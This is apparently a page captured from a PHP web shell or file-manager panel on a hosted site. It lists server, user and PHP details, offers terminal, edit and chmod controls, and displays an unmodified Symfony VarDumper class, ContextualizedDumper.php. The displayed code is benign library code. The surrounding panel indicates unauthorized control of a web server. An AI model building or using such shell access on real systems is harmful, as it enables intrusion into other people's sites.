πŸš€ Hostinger Optimized
πŸ–₯️ Server: LiteSpeed
πŸ’» System: Linux s20058.bom1.stableserver.net 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
πŸ‘€ User: skhata (1324)
🐘 PHP: 8.4.20
🚫 Disabled: ✨ NONE

πŸ’» Terminal

πŸ“ /home/skhata/chandrasons.com/public
$

πŸ“„ ContextualizedDumper.php

πŸ“ Path: /home/skhata/chandrasons.com/vendor/symfony/var-dumper/Dumper/ContextualizedDumper.php
πŸ“Š Size: 1.05 KB
πŸ”’ Perm: 0644
πŸ“ MIME: text/x-php
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\VarDumper\Dumper;

use Symfony\Component\VarDumper\Cloner\Data;
use Symfony\Component\VarDumper\Dumper\ContextProvider\ContextProviderInterface;

/**
 * @author KΓ©vin ThΓ©rage <therage.kevin@gmail.com>
 */
class ContextualizedDumper implements DataDumperInterface
{
    /**
     * @param ContextProviderInterface[] $contextProviders
     */
    public function __construct(
        private DataDumperInterface $wrappedDumper,
        private array $contextProviders,
    ) {
    }

    public function dump(Data $data): ?string
    {
        $context = $data->getContext();
        foreach ($this->contextProviders as $contextProvider) {
            $context[$contextProvider::class] = $contextProvider->getContext();
        }

        return $this->wrappedDumper->dump($data->withContext($context));
    }
}
← BackπŸ“₯ Raw✏️ EditπŸ”’ Chmod
✨ File Manager Magic ✨